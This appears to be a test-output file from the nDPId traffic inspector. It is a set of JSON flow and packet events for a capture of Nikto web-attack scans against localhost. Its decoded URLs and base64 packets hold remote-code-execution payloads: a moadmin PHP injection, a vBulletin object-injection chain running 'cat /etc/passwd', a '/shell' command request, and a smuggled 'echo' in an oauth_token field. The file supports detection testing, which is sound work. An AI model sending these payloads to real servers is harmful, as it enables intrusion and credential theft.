+00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01391{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01398{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} 